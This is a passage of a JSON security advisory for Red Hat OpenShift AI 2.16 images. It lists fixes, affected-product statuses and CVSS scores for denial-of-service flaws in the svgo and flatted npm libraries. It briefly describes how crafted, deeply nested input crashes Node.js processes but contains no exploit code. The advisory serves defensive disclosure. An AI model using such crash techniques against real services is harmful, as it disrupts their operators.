"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-29074"
},
{
"category": "external",
"summary": "RHBZ#2445132",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-29074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"
},
{
"category": "external",
"summary": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673",
"url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"
}
],
"release_date": "2026-03-06T07:23:05.716000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "svgo: SVGO: Denial of Service via XML entity expansion"
},
{
"cve": "CVE-2026-32141",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-12T19:01:30.987208+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2447083"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the flatted npm library. flatted\u0027s parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "flatted: flatted: Unbounded recursion DoS in parse() revive phase",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-32141"
},
{
"category": "external",
"summary": "RHBZ#2447083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-32141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32141"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141"
},
{
"category": "external",
"summary": "https://github.com/WebReflection/flatted/commit/7eb65d857e1a40de11c47461cdbc8541449f0606",
"url": "https://github.com/WebReflection/flatted/commit/7eb65d857e1a40de11c47461cdbc8541449f0606"
},
{
"category": "external",
"summary": "https://github.com/WebReflection/flatted/pull/88",
"url": "https://github.com/WebReflection/flatted/pull/88"
},
{
"category": "external",
"summary": "https://github.com/WebReflection/flatted/security/advisories/GHSA-25h7-pfq9-p65f",
"url": "https://github.com/WebReflection/flatted/security/advisories/GHSA-25h7-pfq9-p65f"
}
],
"release_date": "2026-03-12T18:08:09.634000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
